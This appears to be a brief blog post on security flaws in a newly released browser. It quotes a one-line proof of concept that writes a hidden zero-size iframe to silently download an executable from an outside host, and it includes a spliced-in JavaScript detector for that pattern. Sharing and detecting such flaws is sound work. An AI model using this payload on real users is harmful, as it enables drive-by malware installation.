As I said, my previous post was destined to be outdated very soon.
This is what appeared a few minutes ago on milw0rm and packetstorm:
< script > document.write('< iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0" >'); < / script >
This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.
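A defensive check for the pattern shown above, as an added example that is not part of the original post or of the published proof of concept: it scans page source for zero-size iframes whose `src` resolves to an executable file. The function names and the extension list are assumptions for illustration.

```javascript
// Added example: flag zero-size iframes whose src points at an executable.
// The extension list is an assumption for illustration.
const EXECUTABLE_EXTENSIONS = ['.exe', '.scr', '.msi', '.bat', '.com'];

// Match an opening iframe tag, tolerating the spaced form ("< iframe ... >").
const IFRAME_TAG = /<\s*iframe\b([^>]*)>/gi;
// Match name="value", name='value' or name=value attribute pairs.
const ATTRIBUTE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

function parseAttributes(text) {
  const attrs = {};
  for (const m of text.matchAll(ATTRIBUTE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

function isZero(value) {
  // "0", "0px" and "0%" all render an invisible frame.
  return value !== undefined && /^0+(px|%)?$/i.test(value.trim());
}

function pointsAtExecutable(src) {
  let path;
  try {
    // Resolve against a placeholder base so relative URLs parse too;
    // using the pathname keeps a query string from hiding the extension.
    path = new URL(src, 'http://placeholder.invalid/').pathname;
  } catch {
    return false;
  }
  path = path.toLowerCase();
  return EXECUTABLE_EXTENSIONS.some((ext) => path.endsWith(ext));
}

// Returns the src of every invisible iframe that targets an executable.
function findHiddenExecutableIframes(html) {
  const findings = [];
  for (const tag of html.matchAll(IFRAME_TAG)) {
    const attrs = parseAttributes(tag[1]);
    if (attrs.src && isZero(attrs.width) && isZero(attrs.height) &&
        pointsAtExecutable(attrs.src)) {
      findings.push(attrs.src);
    }
  }
  return findings;
}
```

A zero-size iframe that loads an ordinary HTML page is not reported, so the check stays specific to the silent-download pattern rather than flagging every hidden frame.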
Today Hackers Center stats showed 13% of visitors using the new raw browser.
This is a temporary peak, but still scary considering all the bugs found in less than 48 hours.
I think Google will soon regret this too-soon release.